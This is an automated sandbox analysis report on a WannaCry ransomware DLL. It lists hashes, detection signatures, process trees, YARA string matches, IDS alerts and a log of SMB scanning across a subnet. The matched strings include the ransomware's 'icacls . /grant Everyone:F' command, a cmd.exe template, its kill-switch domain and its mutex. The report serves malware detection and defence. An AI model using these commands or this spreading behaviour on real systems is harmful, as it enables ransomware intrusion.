Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mbXvGlj2dR.dll

Overview

General Information

Sample Name:mbXvGlj2dR.dll
Analysis ID:771980
MD5:ae12bb54af31227017feffd9598a6f5e
SHA1:f597a1cc16d42b7f02e077696e067cd3030a06d9
SHA256:c05e2dab77349cd639aa837e7e121710b8a0718d8fc93fb4cc6458ae90e5c597
Tags:dll
Infos:

Detection

Wannacry
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Antivirus / Scanner detection for submitted sample
Tries to download HTTP data from a sinkholed server
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for sample
Connects to many IPs within the same subnet mask (likely port scanning)
Connects to many different private IPs (likely to spread or exploit)
Machine Learning detection for dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Connects to many different private IPs via SMB (likely to spread or exploit)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Connects to several IPs in different countries
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 4784 cmdline: loaddll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 4596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1380 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5148 cmdline: rundll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • mssecsvc.exe (PID: 1008 cmdline: C:\WINDOWS\mssecsvc.exe MD5: 0C694193CEAC8BFB016491FFB534EB7C)
          • tasksche.exe (PID: 3308 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 7F7CCAA16FB15EB1C7399D422F8363E8)
    • rundll32.exe (PID: 5024 cmdline: rundll32.exe C:\Users\user\Desktop\mbXvGlj2dR.dll,PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6132 cmdline: rundll32.exe "C:\Users\user\Desktop\mbXvGlj2dR.dll",PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • mssecsvc.exe (PID: 5232 cmdline: C:\WINDOWS\mssecsvc.exe MD5: 0C694193CEAC8BFB016491FFB534EB7C)
        • tasksche.exe (PID: 3204 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 7F7CCAA16FB15EB1C7399D422F8363E8)
  • mssecsvc.exe (PID: 492 cmdline: C:\WINDOWS\mssecsvc.exe -m security MD5: 0C694193CEAC8BFB016491FFB534EB7C)
  • svchost.exe (PID: 5668 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
mbXvGlj2dR.dllWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
  • 0x45604:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x353d0:$x3: tasksche.exe
  • 0x455e0:$x3: tasksche.exe
  • 0x455bc:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x45634:$x5: WNcry@2ol7
  • 0x3543b:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
  • 0x3028:$x7: mssecsvc.exe
  • 0x120ac:$x7: mssecsvc.exe
  • 0x1b3b4:$x7: mssecsvc.exe
  • 0x353a8:$x8: C:\%s\qeriuwjhrf
  • 0x45604:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0x3014:$s1: C:\%s\%s
  • 0x12098:$s1: C:\%s\%s
  • 0x1b39c:$s1: C:\%s\%s
  • 0x353bc:$s1: C:\%s\%s
  • 0x45534:$s3: cmd.exe /c "%s"
  • 0x77a88:$s4: msg/m_portuguese.wnry
  • 0x326f0:$s5: \\192.168.56.20\IPC$
  • 0x1fae5:$s6: \\172.16.99.5\IPC$
  • 0xd195:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x78da:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
mbXvGlj2dR.dllJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
    mbXvGlj2dR.dllwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0x455e0:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0x45608:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
    SourceRuleDescriptionAuthorStrings
    C:\Windows\tasksche.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
    • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
    • 0xf4d8:$x3: tasksche.exe
    • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
    • 0xf52c:$x5: WNcry@2ol7
    • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
    • 0xf42c:$s3: cmd.exe /c "%s"
    • 0x41980:$s4: msg/m_portuguese.wnry
    • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
    • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
    • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
    C:\Windows\tasksche.exeJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
      C:\Windows\tasksche.exewanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
      • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
      • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
      C:\Windows\tasksche.exeWin32_Ransomware_WannaCryunknownReversingLabs
      • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
      • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
      C:\Windows\mssecsvc.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
      • 0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q
      • 0x3136c:$x3: tasksche.exe
      • 0x4157c:$x3: tasksche.exe
      • 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA
      • 0x415d0:$x5: WNcry@2ol7
      • 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
      • 0xe048:$x7: mssecsvc.exe
      • 0x17350:$x7: mssecsvc.exe
      • 0x31344:$x8: C:\%s\qeriuwjhrf
      • 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q
      • 0xe034:$s1: C:\%s\%s
      • 0x17338:$s1: C:\%s\%s
      • 0x31358:$s1: C:\%s\%s
      • 0x414d0:$s3: cmd.exe /c "%s"
      • 0x73a24:$s4: msg/m_portuguese.wnry
      • 0x2e68c:$s5: \\192.168.56.20\IPC$
      • 0x1ba81:$s6: \\172.16.99.5\IPC$
      • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
      • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
      • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
      • 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
      Click to see the 4 entries
      SourceRuleDescriptionAuthorStrings
      00000005.00000000.299041291.000000000040F000.00000008.00000001.01000000.00000004.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
        00000008.00000002.817946174.000000000042E000.00000004.00000001.01000000.00000004.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
          00000008.00000000.306091681.000000000040F000.00000008.00000001.01000000.00000004.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
            00000005.00000000.301622527.000000000040F000.00000008.00000001.01000000.00000004.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
              0000000A.00000000.313432129.000000000040E000.00000008.00000001.01000000.00000006.sdmpwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
              • 0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
              • 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
              Click to see the 42 entries
              SourceRuleDescriptionAuthorStrings
              8.2.mssecsvc.exe.1fc8084.3.raw.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
              • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
              • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
              • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
              5.0.mssecsvc.exe.7100a4.1.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
              • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
              • 0xf4d8:$x3: tasksche.exe
              • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
              • 0xf52c:$x5: WNcry@2ol7
              • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
              • 0xf42c:$s3: cmd.exe /c "%s"
              • 0x41980:$s4: msg/m_portuguese.wnry
              • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
              • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
              • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
              5.0.mssecsvc.exe.7100a4.1.unpackJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
                5.0.mssecsvc.exe.7100a4.1.unpackwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
                • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
                • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
                5.0.mssecsvc.exe.7100a4.1.unpackWin32_Ransomware_WannaCryunknownReversingLabs
                • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
                • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
                Click to see the 213 entries
                No Sigma rule has matched
                Timestamp:192.168.2.5104.16.173.8049705802024298 12/22/22-10:04:12.821735
                SID:2024298
                Source Port:49705
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:104.16.173.80192.168.2.580497052031515 12/22/22-10:04:12.892621
                SID:2031515
                Source Port:80
                Destination Port:49705
                Protocol:TCP
                Classtype:Misc activity
                Timestamp:192.168.2.58.8.8.849177532024291 12/22/22-10:04:11.399493
                SID:2024291
                Source Port:49177
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.58.8.8.861452532024291 12/22/22-10:04:14.774772
                SID:2024291
                Source Port:61452
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:104.16.173.80192.168.2.580497042031515 12/22/22-10:04:11.530386
                SID:2031515
                Source Port:80
                Destination Port:49704
                Protocol:TCP
                Classtype:Misc activity
                Timestamp:192.168.2.58.8.8.849724532024291 12/22/22-10:04:12.766078
                SID:2024291
                Source Port:49724
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.5104.16.173.8049704802024298 12/22/22-10:04:11.489060
                SID:2024298
                Source Port:49704
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.5104.17.244.8149729802024298 12/22/22-10:04:14.861584
                SID:2024298
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:104.17.244.81192.168.2.580497292031515 12/22/22-10:04:14.898456
                SID:2031515
                Source Port:80
                Destination Port:49729
                Protocol:TCP
                Classtype:Misc activity

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: mbXvGlj2dR.dllReversingLabs: Detection: 91%
                Source: mbXvGlj2dR.dllVirustotal: Detection: 87%Perma Link
                Source: mbXvGlj2dR.dllAvira: detected
                Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comURL Reputation: Label: malware
                Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/URL Reputation: Label: malware
                Source: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comVirustotal: Detection: 12%Perma Link
                Source: C:\Windows\mssecsvc.exeAvira: detection malicious, Label: TR/AD.WannaCry.bqdjz
                Source: C:\Windows\tasksche.exeAvira: detection malicious, Label: TR/AD.WannaCry.sewvt
                Source: C:\WINDOWS\qeriuwjhrf (copy)ReversingLabs: Detection: 97%
                Source: C:\Windows\mssecsvc.exeReversingLabs: Detection: 95%
                Source: mbXvGlj2dR.dllJoe Sandbox ML: detected
                Source: C:\Windows\mssecsvc.exeJoe Sandbox ML: detected
                Source: C:\Windows\tasksche.exeJoe Sandbox ML: detected
                Source: 7.0.mssecsvc.exe.7100a4.7.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 7.2.mssecsvc.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 5.0.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 8.2.mssecsvc.exe.251f96c.8.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 10.0.tasksche.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 5.0.mssecsvc.exe.400000.2.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 8.2.mssecsvc.exe.1fc8084.3.unpackAvira: Label: TR/Ransom.Gen
                Source: 7.0.mssecsvc.exe.400000.2.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 5.0.mssecsvc.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 8.0.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 8.2.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 7.0.mssecsvc.exe.400000.6.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 5.0.mssecsvc.exe.400000.6.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 7.0.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 8.2.mssecsvc.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 5.0.mssecsvc.exe.7100a4.3.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 9.2.tasksche.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 7.0.mssecsvc.exe.400000.4.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 7.0.mssecsvc.exe.7100a4.5.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 5.0.mssecsvc.exe.7100a4.5.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 5.2.mssecsvc.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 8.0.mssecsvc.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 7.0.mssecsvc.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 9.0.tasksche.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 5.2.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 10.2.tasksche.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 8.2.mssecsvc.exe.1ffa128.5.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 8.2.mssecsvc.exe.24ed8c8.7.unpackAvira: Label: TR/Ransom.Gen
                Source: 7.2.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 5.0.mssecsvc.exe.7100a4.7.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 7.0.mssecsvc.exe.7100a4.3.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 5.0.mssecsvc.exe.400000.4.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: C:\Windows\tasksche.exeCode function: 9_2_004018B9 CryptReleaseContext,9_2_004018B9

                Exploits

                barindex
                Source: global trafficTCP traffic: 192.168.2.39:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.38:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.42:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.41:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.44:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.43:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.46:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.45:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.48:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.47:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.40:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.28:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.27:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.29:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.31:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.30:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.33:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.32:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.35:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.34:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.37:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.36:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.17:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.16:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.97:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.96:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.99:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.98:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.91:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.90:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.93:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.92:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.95:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.94:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.104:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.105:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.102:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.103:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.108:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.109:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.106:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.107:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.100:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.101:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.115:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.116:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.113:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.114:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.119:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.117:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.118:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.111:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.112:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.110:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.39:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.38:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.42:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.41:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.44:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.43:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.46:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.45:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.48:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.47:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.40:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.28:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.27:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.29:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.31:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.30:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.33:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.32:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.35:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.34:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.37:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.36:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.17:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.16:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.97:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.96:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
